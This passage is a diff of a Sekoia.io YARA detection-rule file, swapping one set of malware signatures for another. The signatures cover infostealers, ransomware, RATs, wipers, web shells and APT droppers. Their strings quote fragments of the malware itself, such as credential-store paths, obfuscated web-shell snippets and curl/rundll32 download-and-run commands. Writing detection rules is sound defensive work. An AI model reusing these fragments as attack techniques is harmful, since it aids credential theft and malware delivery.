-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sugardump_credentials_stealer_http.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8d1725da41704fd534d3438021a98d0fb9b9b5bfdc63cc3144c4957954be1870"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_backdoordiplomaty_custommerlinagent_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "31d13e234dc3f68f6826a5310ac38693750f896318249d04a31c5e6c8d5eba91"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232383,40 +233035,26 @@ rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Http : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\Google\\Chrome\\User Data" wide
-		$ = "\\DebugLogWindowsDefender.txt" wide
-		$ = "Opera Software\\Opera Stable" wide
-		$ = "Microsoft\\Edge\\User Data" wide
-		$ = "\"encrypted_key\":\"(.*?)\\" wide
-		$ = "Url:" wide
-		$ = "Username:" wide
-		$ = "Password:" wide
-		$ = "Application:" wide
-		$ = "BCrypt.BCryptDecrypt" wide
-		$ = "C:\\Users\\User\\" wide
-		$ = "_CorExeMain"
-		$ = "http://" wide
+		$ = "agent.GetSpecificID"
+		$ = "agent.ExecuteCommand"
+		$ = "agent.getClient"
+		$ = "agent.SignalListen"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 10 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 10MB and all of them
 }
-rule SEKOIA_Tool_Bypassgodzilla : FILE
+rule SEKOIA_Infostealer_Win_Pennywise_Mar23 : FILE
 {
 	meta:
-		description = "Detects payload of BypassGodzilla"
+		description = "Finds PennyWise samples based on strings"
 		author = "Sekoia.io"
-		id = "fa492f97-a46c-422d-a617-c503744ee22e"
-		date = "2024-09-09"
+		id = "9852b7e7-dfff-44e6-9068-d287cc84b069"
+		date = "2023-03-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_bypassgodzilla.yar#L1-L38"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "571c9042c627abba19ba1d591e2083eb"
-		hash = "56cfc5a876f8f55bf184be9f368b6d8a"
-		hash = "d4f7ca537701aee8849c474bc4df19d1"
-		hash = "e4be04331c5f447b3ca03aa637d16c85"
-		hash = "905fa3b692577a086ac654ef89e8b83d"
-		logic_hash = "47e52267c73209c6191910ac21bca44acac2100be96250fd5dda1f889fb03b07"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_pennywise_mar23.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "55d7d6894de23af38230eaaff0a38c31d11d3df34aacd21fd93393d266c9357c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232424,84 +233062,107 @@ rule SEKOIA_Tool_Bypassgodzilla : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$jsp_1a = "response.getWriter().write(\""
-		$jsp_1b = "\".substring("
-		$jsp_2a = "response.getWriter().write(java.util.Base64/*"
-		$jsp_2b = "*/.getEncoder()/*"
-		$jsp_2c = ".toByteArray(),true)));"
-		$asp_1 = "[\"payload\"]).CreateInstance(\"LY\");"
-		$asp_2 = "\\U00000045\\U00000071\\U00000075\\U00000061\\U0000006C\\U00000073(Context);"
-		$php_1 = "=(\"!\"^\"@\").'ss'.Chr(\"101\").'rs';"
-		$php_2 = "*/md5/*"
-		$php_3 = "*/isset($_SESSION/*"
-		$php_4 = "@set_time_limit(Chr(\"48\"))"
+		$chr01 = "MvgmsudRT3loHygSj1F9K" ascii
+		$chr02 = "WebInfidelity2023" ascii
+		$chr03 = "PennyWise" ascii
+		$str01 = "get_Handle" ascii
+		$str02 = "get_Now" ascii
+		$str03 = "get_Ticks" ascii
+		$str04 = "set_Expect100Continue" ascii
+		$str05 = "get_Jpeg" ascii
+		$str06 = "set_UseShellExecute" ascii
+		$str07 = "get_ProcessName" ascii
+		$str08 = "get_UtcNow" ascii
 
 	condition:
-		(( all of ( $jsp_* ) and ( @jsp_1b- @jsp_1a < 70 ) and ( @jsp_2b- @jsp_2a < 70 ) and ( @jsp_2c - @jsp_2a < 160 ) ) or ( all of ( $asp_* ) and ( @asp_2 > @asp_1 ) ) or ( all of ( $php_* ) ) ) and filesize < 30KB and true
+		uint16( 0 ) == 0x5A4D and 1 of ( $chr* ) and 5 of ( $str* )
 }
-rule SEKOIA_Apt_Badmagic_Listfiles_Pshscript : FILE
+
+rule SEKOIA_Wiper_Hermeticwiper_Variants
 {
 	meta:
-		description = "Detects BadMagic ListFiles powershell script"
+		description = "Matches HermeticWiper and possible variants"
 		author = "Sekoia.io"
-		id = "55f1c409-234e-4feb-91a3-9bf5c41ec2b8"
-		date = "2023-05-15"
+		id = "102ecf15-167e-49e4-932c-6334e3cdcc69"
+		date = "2022-02-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_listfiles_pshscript.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4401d31e4b0484776aab51c161a301fc4ee3e944a1669df763bd274014178368"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/wiper_hermeticwiper_variants.yar#L3-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d0c358517b0a6334d430d3bd75d6c58243ce84e0f90afe48a5069a1e1954119c"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$env:USERPROFILE"
-		$ = "-Include *.jpg, *.odt, *.doc, *.docx"
+		$ = "SeLoadDriverPrivilege" wide
+		$ = "\\\\.\\PhysicalDrive" wide
+		$ = "::$INDEX_ALLOCATION" wide
+		$ = "CrashDumpEnabled" wide
 
 	condition:
-		all of them and filesize < 1KB
+		2 of them and pe.characteristics and pe.number_of_signatures == 1 and pe.number_of_resources > 2 and for 2 i in ( 0 .. pe.number_of_resources - 1 ) : ( uint32be( pe.resources [ i ] . offset + 15 ) == 0x4D5A9000 and uint16be( pe.resources [ i ] . offset ) == 0x535A )
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_2 : FILE
+rule SEKOIA_Rat_Win_Xworm_V2 : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Finds XWorm v2 samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "02bc795f-b8e0-44d4-b475-310359867577"
-		date = "2023-02-03"
+		id = "6cf06f52-0337-415d-8f29-f63d67e228f8"
+		date = "2022-11-07"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_2.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c26779cd35d6430da3629df8b310356d663c05e82db0aca0fc974bc3a298c92e"
+		reference = "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_xworm_v2.yar#L1-L38"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "58a2dbfbd453855021942902a6d55d150eee3acba67a294da24448cfca4f811e"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "var e={},i,b=0,c,x,l=0,a,r="
-		$ = "eval(plain);"
-		$ = "var plain = rc4("
+		$str01 = "XWorm.exe" wide ascii
+		$str02 = "ngrok" wide ascii
+		$str03 = "Mutexx" ascii
+		$str04 = "FileManagerSplitFileManagerSplit" wide
+		$str05 = "InstallngC" wide
+		$str06 = "downloadedfile" wide
+		$str07 = "creatfile" wide
+		$str08 = "creatnewfolder" wide
+		$str09 = "showfolderfile" wide
+		$str10 = "hidefolderfile" wide
+		$str11 = "txtttt" wide
+		$str12 = "\\root\\SecurityCenter2" wide
+		$str13 = "[USB]" wide
+		$str14 = "[Drive]" wide
+		$str15 = "[Folder]" wide
+		$str16 = "HVNC" wide
+		$str17 = "http://exmple.com/Uploader.php" wide
+		$str18 = "XKlog.txt" wide
+		$str19 = "Select * from AntivirusProduct" wide
+		$str20 = "runnnnnn" wide
+		$str21 = "RunBotKiller" wide
+		$str22 = "bypss" wide
+		$str23 = "<Xwormmm>" wide
 
 	condition:
-		all of them and filesize < 2MB
+		uint16( 0 ) == 0x5A4D and 12 of them
 }
-rule SEKOIA_Apt_Toddycat_Waexp_Strings : FILE
+rule SEKOIA_Apt_Scanbox_Obfuscated_Versions : FILE
 {
 	meta:
-		description = "Detects WAExp based on strings"
+		description = "Detects obfuscated versions of the scanbox framework"
 		author = "Sekoia.io"
-		id = "1bbb3e81-14a9-4bda-b647-b6f5255e9a16"
-		date = "2024-04-23"
+		id = "2866cead-7f16-4895-80ef-aad6fb66e864"
+		date = "2022-09-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_toddycat_waexp_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4377183b326329fb14ae3911fbb1e29cde220d7b247d048fba4bbbda9de8938d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_scanbox_obfuscated_versions.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0395d1ac9a593aa8249f6d16c485e431349cecf2f379d2b5bac466541f71968c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232509,26 +233170,28 @@ rule SEKOIA_Apt_Toddycat_Waexp_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[>] Profile:" wide ascii
-		$ = "[+] All Done" wide ascii
-		$ = "[+] Files:" wide ascii
+		$ = "$_$_$_$__$_____$__$_$_$_$__$"
+		$ = "NztCm_NcDkh"
+		$ = "____$_$__$__$_______w____$_$__$__$_____i____$_$__$__$_____"
+		$ = "391,379,398,381,386"
+		$ = "plguinurl"
+		$ = "plugin_timeout*1000"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 1MB
+		2 of them and filesize < 500KB
 }
-rule SEKOIA_Tool_Nssm_Strings : FILE
+rule SEKOIA_Hacktool_Ligolo_Strings : FILE
 {
 	meta:
-		description = "Detects nssm tool"
+		description = "Detects ligolo based on strings"
 		author = "Sekoia.io"
-		id = "fab99d44-6494-4bfc-80c0-67c45bad0425"
-		date = "2024-09-06"
+		id = "5013256b-eda3-417e-ac72-959055b01c7e"
+		date = "2022-02-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_nssm_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "beceae2fdc4f7729a93e94ac2ccd78cc"
-		logic_hash = "ca883f3ed9f510cbcd9b96ad167e9d6725341c311b023f22edcba721e801f07d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_ligolo_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "12609bed61ef4d86737bc652a75c74f01e4a251466129ff56da0d7e002566d50"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232536,27 +233199,27 @@ rule SEKOIA_Tool_Nssm_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "nssm start <servicename>" wide
-		$ = "nssm stop <servicename>" wide
-		$ = "nssm restart <servicename>" wide
-		$ = "nssm status <servicename>" wide
-		$ = "nssm rotate <servicename>" wide
+		$ = "Restarting Ligolo..."
+		$ = "Ligolo starts a socks5 proxy server"
+		$ = "main.startSocksProxy"
+		$ = "main.handleRelay"
+		$ = "main.StartLigolo"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them and filesize < 500KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 2MB and filesize < 5MB and 3 of them
 }
-rule SEKOIA_Apt_Apt28_Htmlsmuggling_Disclosing_Ip : FILE
+rule SEKOIA_Apt_Badmagic_Startngrok_Pshscript : FILE
 {
 	meta:
-		description = "Detects some kind of HTMLSmuggling used by APT28"
+		description = "Detects BadMagic StartNgrok powershell script"
 		author = "Sekoia.io"
-		id = "57adc227-2b72-457e-a786-97ca1a7300d8"
-		date = "2023-09-11"
+		id = "94d64482-3033-4531-8530-58546364ac06"
+		date = "2023-05-15"
 		modified = "2024-12-19"
-		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt28_htmlsmuggling_disclosing_ip.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "047d2d5f8d04576b6d57bc599f82406804845a3acb7628e7ad9b56e71e4dfe92"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_startngrok_pshscript.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f15f9dc2c35f3f7cd816aa539c03b857254c3628c9b14eacca1110bb85b1a24c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232564,155 +233227,172 @@ rule SEKOIA_Apt_Apt28_Htmlsmuggling_Disclosing_Ip : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "ipapi.co/json"
-		$s2 = "a.download("
-		$s3 = "a.click("
+		$ = "$ExecutablePath http \"\"file:///$Disk"
+		$ = "write \"$ExecutablePath not found"
+		$ = "$ng_proxy_string ="
+		$ = "$ng_auth_token ="
+		$ = "$env:ALLUSERSPROFILE\\$NGrokFolderName"
 
 	condition:
-		$s1 and $s2 and $s3 and filesize < 5000
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Dropper_Win_Selfau3
+rule SEKOIA_Apt_Polonium_Technocreep_Strings : FILE
 {
 	meta:
-		description = "Finds SelfAU3 Dropper samples based on specific strings"
+		description = "Tries to detect TechnoCreep implant"
 		author = "Sekoia.io"
-		id = "2d005a54-b013-40e9-b88a-30454e4b22af"
-		date = "2024-02-12"
+		id = "dad79df3-b081-458e-9c14-1d5e2b43ba91"
+		date = "2022-10-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/dropper_win_selfau3.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5f69457127ae6cb84b04f72dd30393dbcf32b4ba26ec6d529eebcc03191cbed3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_polonium_technocreep_strings.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6fbd14d39f215b835c0fe7709041ca982774be42d389397d19a41fda6f7a00d1"
 		score = 75
 		quality = 80
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$sfx = "!Require Windows" ascii
-		$ins01 = ";!@Install@!UTF-8!" ascii
-		$set = {53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 3d 22 [1-15] 3d ?? 22}
-		$run = "RunProgram=\"hidcon:c" ascii
-		$ins02 = ";!@InstallEnd@!" ascii
+		$ = "file name : " ascii wide
+		$ = "copy to : " ascii wide
+		$ = "download" ascii wide
+		$ = "persistence" ascii wide
+		$ = "/cmdResult created!" ascii wide
+		$ = "/downloadsResulat created!" ascii wide
+		$ = "Downloading will take minets..." ascii wide
+		$ = "powershell -Command \"$c1 = " ascii wide
+		$ = "Missing Parameter.. Format of command:" ascii wide
+		$ = "File Fath On Target Device Not Exists>" ascii wide
+		$ = "/MissingDownloadParameter.txt" ascii wide
 
 	condition:
-		$sfx at 77 and $set in ( @ins01 .. @ins01 + 500 ) and #set > 5 and $run in ( @set .. @set + 1000 ) and $ins02 in ( @run .. @run + 500 )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
 }
-rule SEKOIA_Ransomware_Win_Voidcrypt : FILE
+rule SEKOIA_Malware_Win_Lyceum_Maldoc_Macro_20220613
 {
 	meta:
-		description = "Detect the Limbozar / VoidCrypt ransomware"
+		description = "Detect the macro contained in Lyceum maldoc to deploy its malware"
 		author = "Sekoia.io"
-		id = "394033cc-20fe-4ced-8d77-5f1061bb8c96"
-		date = "2021-10-07"
+		id = "3046bffd-261f-4d5b-9015-f2e5fc31c9c9"
+		date = "2022-06-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_voidcrypt.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7e28bae5830df779bf2367482fb966f5cab691a6c8c474950f7442d8fec054a0"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malware_win_lyceum_maldoc_macro_20220613.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a9f4957e8198b4cb2229913a405b3e0fc97cbd3598bb583dbfdaf56ca278d4cb"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "C:\\ProgramData\\pkey.txt" ascii
-		$s2 = "C:\\ProgramData\\IDk.txt" ascii
-		$s3 = "fuckyoufuckyoufuckyoufuckyou" ascii
+		$ = "ActiveDocument.InlineShapes(i).PictureFormat.Brightness = 0.5" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them
 }
-
-rule SEKOIA_Loader_Win_Jennlog
+rule SEKOIA_Downloader_Win_Curl_Agent
 {
 	meta:
-		description = "Jennlog loader used to deliver the Apostle ransomware"
+		description = "Detect the downloader used by Bluenoroff to install it CurlAgent"
 		author = "Sekoia.io"
-		id = "a69088e5-207f-494f-876b-766b8050e8c2"
-		date = "2021-10-04"
+		id = "ddeb2d8f-1b10-4a33-b768-d19412e8551a"
+		date = "2023-05-02"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_jennlog.yar#L4-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0ffcd1f35570b28a1bd6f9a0361f8f921942f7345dcb2896fc092bb92f7d4d6d"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_curl_agent.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b34375ec051c969adec82901c1130b0a389261912559d70c652ee826cb2d4107"
 		score = 75
 		quality = 80
 		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$ = "%s\\marcoor.dll" wide
+		$ = "curl -A cur1-agent -L %s -s -d dl"
+		$ = "curl -A cur1-agent -L %s -s -d da"
+		$ = "cmd /c timeout /t 10 & rundll32 \"%s\" #1" wide
+		$ = "cmd /c timeout /t 10 & Del /f /q \"%s\" & attrib -s -h \"%s\" & rundll32 \"%s\" #1" wide
+
 	condition:
-		pe.timestamp== 3140259112 or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4c4577276ff0323d9aedcc39ecf2c964" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "8476a7fca587f1e5d3ae076293b9fbcccbebc4bd4f7b783228ad5da39305a3d9" )
+		3 of them
 }
-rule SEKOIA_Apt_Kimsuky_Validator_Strings : FILE
+rule SEKOIA_Stealer_Win_Mgbot_Credential_Stealer : FILE
 {
 	meta:
-		description = "Detects Kimsuky validator"
+		description = "Detect MgBot credential stealer plugin"
 		author = "Sekoia.io"
-		id = "e055f2d4-8318-4342-812e-0f621d7886b4"
-		date = "2024-06-11"
+		id = "e06501c1-c842-43f7-a429-9026bc0a4fd4"
+		date = "2024-03-20"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_validator_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a627dae8c12f0f6f8472bc12b8e1a85137f92f6e389f817ab9023c90720a42b0"
+		reference = "https://www.welivesecurity.com/2023/04/26/evasive-panda-apt-group-malware-updates-popular-chinese-software/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/stealer_win_mgbot_credential_stealer.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "27f1b0ac818753804f0e67ac158d9376ab6beff8613ef94a1aa6cf8dd6815d49"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "174a62201c7e2af67b7ad37bf7935f064a379f169cf257ca16e912a46ecc9841"
+		hash2 = "cb7d9feda7d8ebfba93ec428d5a8a4382bf58e5a70e4b51eb1938d2691d5d4a5"
 
 	strings:
-		$ = "%s%sc %s >%s 2>&1" wide
-		$ = "%s%sc %s 2>%s" wide
+		$ = "Software\\Aerofox\\Foxmail\\Indenties" wide
+		$ = "Software\\Aerofox\\FoxmailPreview" wide
+		$ = "IMAP Password" wide
+		$ = "POP3 Password" wide
 
 	condition:
 		uint16be( 0 ) == 0x4d5a and all of them
 }
-
-rule SEKOIA_Installer_Win_Minibus : FILE
+rule SEKOIA_Apt_Gelsemium_Wolfsbane_Backdoor : FILE
 {
 	meta:
-		description = "Detect MINIBUS installer"
+		description = "Detects Gelsemium's WolfsBane backdoor"
 		author = "Sekoia.io"
-		id = "0f7f600d-d93b-4b5a-aa0e-7d91038409e6"
-		date = "2024-04-08"
+		id = "db2ad5a4-b592-4646-a385-c668bb2ea090"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/installer_win_minibus.yar#L4-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "24326c9f5dcb7e66d47b65bf6bec6fe78be18c8d41a3039fbd09b453568a3f8f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gelsemium_wolfsbane_backdoor.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "1418fe9a743226b9661a2b6decb19db0"
+		logic_hash = "97d5076ca4c204a2e2276fd250d64bc140da1f2c8dec9996db7a622385f2c0ac"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "26ca51cb067e1fdf1b8ad54ba49883bc5d1945952239aec0c4840754bff76621"
-		hash2 = "90fa29cc98be1d715df26d22079bdb8ce1d1fd3ce6a4efb39a4c192134e01020"
 
 	strings:
-		$ = "\\essential.dat"
-		$ = "TorvaldInitial.dll"
+		$ = "udp_session"
+		$ = "session_interface"
+		$ = "plugin_persist"
+		$ = "Udp.cpp"
+		$ = "ikcp.c"
+		$ = "' %s 2>/dev/null"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" )
+		uint32be( 0 ) == 0x7f454c46 and filesize > 3MB and filesize < 4MB and 4 of them
 }
-rule SEKOIA_Infostealer_Win_Xenostealer_Strings : FILE
+rule SEKOIA_Apt_Apt41_Javascript_Dropper : FILE
 {
 	meta:
-		description = "Finds XenoStealer standalone samples based on the strings"
+		description = "Detects Earth Lusca JS dropper"
 		author = "Sekoia.io"
-		id = "0a41788b-1fa7-44ff-af85-9c1ff1892aad"
-		date = "2024-10-30"
+		id = "fde70806-af50-4706-9daf-d39ad0564fc7"
+		date = "2024-02-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/moom825/XenoStealer/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_xenostealer_strings.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "b74733d68e95220ab0630a68ddf973b0c959fd421628e639c1b91e465ba9299b"
-		logic_hash = "1c48b15b8e9648c1c4d2f9c0a9ee3f4c48605fa44772b87a03ad81923e5adf15"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt41_javascript_dropper.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3e34af7141e41044c3d3e099e8b8deafc7441ea47ccbd8af7ffe686f10bb18a2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232720,41 +233400,28 @@ rule SEKOIA_Infostealer_Win_Xenostealer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "XenoStealer" ascii wide
-		$str02 = "$d05de59c-9ee5-4e7e-abb5-8f2cc3f72cd1" ascii
-		$str03 = "SteamInfo" ascii
-		$str04 = "TelegramInfo" ascii
-		$str05 = "NgrokInfo" ascii
-		$str06 = "pAuthInfo" ascii
-		$str07 = "FoxMailInfo" ascii
-		$str08 = "_hasNitro" ascii
-		$str09 = "_games" ascii
-		$str10 = "_profiles" ascii
-		$str11 = "_cookies" ascii
-		$str12 = "_creditCards" ascii
-		$str13 = "_cryptoExtensions" ascii
-		$str14 = "_passwordManagerExtensions" ascii
-		$str15 = "ChromiumBrowsersLikelyLocations" ascii
